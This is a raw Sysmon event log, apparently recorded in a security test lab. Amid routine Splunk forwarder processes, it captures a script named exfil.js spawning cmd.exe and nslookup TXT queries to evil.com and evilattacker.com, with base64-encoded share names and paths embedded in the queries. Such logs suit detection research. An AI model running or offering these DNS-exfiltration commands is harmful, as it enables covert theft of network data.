"C:\Temp\exfil.js" 154100x800000000000000071942Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:22.206{A8622C2F-5AE2-6078-0B0F-00000000AE01}564C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000071931Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:21.346{A8622C2F-5AE1-6078-0A0F-00000000AE01}5184C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5AE1-6078-080F-00000000AE01}5456C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpvb.tmp 2>&1 154100x800000000000000071920Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:21.316{A8622C2F-5AE1-6078-080F-00000000AE01}5456C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpvb.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000071908Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:20.642{A8622C2F-5AE0-6078-070F-00000000AE01}6492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000071899Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:19.960{A8622C2F-5ADF-6078-060F-00000000AE01}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000071885Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:19.294{A8622C2F-5ADF-6078-050F-00000000AE01}1408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000071870Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:17.476{A8622C2F-5ADD-6078-040F-00000000AE01}6032C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000071860Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:16.811{A8622C2F-5ADC-6078-030F-00000000AE01}4808C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000071849Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:16.193{A8622C2F-5ADC-6078-020F-00000000AE01}5628C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000071784Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:06.276{A8622C2F-5AD2-6078-010F-00000000AE01}3220C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5AD2-6078-FF0E-00000000AE01}1372C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlodee.tmp 2>&1 154100x800000000000000071773Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:06.247{A8622C2F-5AD2-6078-FF0E-00000000AE01}1372C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlodee.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000071719Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:53.770{A8622C2F-5AC5-6078-FE0E-00000000AE01}5988C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5AC5-6078-FC0E-00000000AE01}1996C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgfap.tmp 2>&1 154100x800000000000000071708Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:53.741{A8622C2F-5AC5-6078-FC0E-00000000AE01}1996C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgfap.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000071649Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:39.250{A8622C2F-5AB7-6078-FB0E-00000000AE01}1140C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5AB7-6078-F90E-00000000AE01}7036C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltmrwus.tmp 2>&1 154100x800000000000000071638Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:39.218{A8622C2F-5AB7-6078-F90E-00000000AE01}7036C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltmrwus.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000071629Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:38.619{A8622C2F-5AB6-6078-F80E-00000000AE01}5184C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evilattacker.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5AB6-6078-F60E-00000000AE01}4808C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmzma.tmp 2>&1 154100x800000000000000071618Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:38.588{A8622C2F-5AB6-6078-F60E-00000000AE01}4808C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmzma.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000071588Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:36.176{A8622C2F-5AB4-6078-F50E-00000000AE01}5456C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5AB4-6078-F30E-00000000AE01}5344C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwwf.tmp 2>&1 154100x800000000000000071576Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:36.147{A8622C2F-5AB4-6078-F30E-00000000AE01}5344C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwwf.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000071487Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:23.685{A8622C2F-5AA7-6078-F20E-00000000AE01}5316C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5AA7-6078-F00E-00000000AE01}928C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzgmxa.tmp 2>&1 154100x800000000000000071476Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:23.655{A8622C2F-5AA7-6078-F00E-00000000AE01}928C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzgmxa.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000071461Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:22.356{A8622C2F-5AA6-6078-EF0E-00000000AE01}5864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000071447Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:20.548{A8622C2F-5AA4-6078-EE0E-00000000AE01}2196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000071437Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:19.944{A8622C2F-5AA3-6078-ED0E-00000000AE01}3912C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000071426Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:19.280{A8622C2F-5AA3-6078-EC0E-00000000AE01}6672C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000071410Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:17.433{A8622C2F-5AA1-6078-EB0E-00000000AE01}5316C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000071402Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:16.767{A8622C2F-5AA0-6078-EA0E-00000000AE01}3904C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000071391Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:16.193{A8622C2F-5AA0-6078-E90E-00000000AE01}6032C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000071316Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:06.101{A8622C2F-5A96-6078-E80E-00000000AE01}4764C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A96-6078-E60E-00000000AE01}6516C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzcottg.tmp 2>&1 154100x800000000000000071305Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:06.071{A8622C2F-5A96-6078-E60E-00000000AE01}6516C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzcottg.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 